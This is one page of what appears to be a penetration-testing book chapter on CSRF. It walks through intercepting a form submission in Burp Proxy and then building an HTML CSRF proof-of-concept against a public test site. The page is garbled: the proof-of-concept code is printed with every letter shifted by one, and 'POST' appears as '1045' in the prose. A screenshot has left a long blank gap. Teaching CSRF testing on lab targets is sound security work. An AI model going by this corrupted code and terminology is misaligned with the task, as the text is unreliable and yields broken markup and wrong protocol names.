CSRF and Insecure Session Authentication                                    Chapter 6

            In order to build our CSRF PoC, it can be helpful to see the form as an HTTP action, so we
            can grab the type of data-encoding, HTTP verb, and form-field information all at once.

            In order to view that request, make sure you're viewing the page in a browser connected to
            your Burp Proxy and then turn the intercept feature on from within the Proxy tab. Clicking
            Submit, you should see the form hang as the Burp Proxy intercepts (and holds onto) the
            form's HTTP 1045 request:
































            From this, we can deduce all the necessary parts of our CSRF PoC. Let's take a look at the
            code and then break down the rationale behind each tag and attribute:
                 IUNM
                     GPSN FODUZQF  BQQMJDBUJPO Y XXX GPSN VSMFODPEFE  NFUIPE  1045
                BDUJPO  IUUQ   XFCTDBOUFTU DPN DSPTTUSBJOJOH BCPVUZPV QIQ
                         MBCFM GOBNF  MBCFM  JOQVU UZQF  UFYU  WBMVF  8JMMJBN
                OBNF  GOBNF
                         MBCFM OJDL  MBCFM  JOQVU UZQF  UFYU  WBMVF  1SJWBUF .BOEFMMB
                OBNF  OJDL
                         MBCFM MOBNF  MBCFM  JOQVU UZQF  UFYU  WBMVF  .BOEFMMB
                OBNF  MOBNF
                         MBCFM TVCNJU  MBCFM  JOQVU UZQF  UFYU  WBMVF  TVCNJU
                OBNF  TVCNJU
                         JOQVU UZQF  TVCNJU
                WBMVF  IUUQ   XFCTDBOUFTU DPN DSPTTUSBJOJOH BCPVUZPV QIQ

                                                    [ 95 ]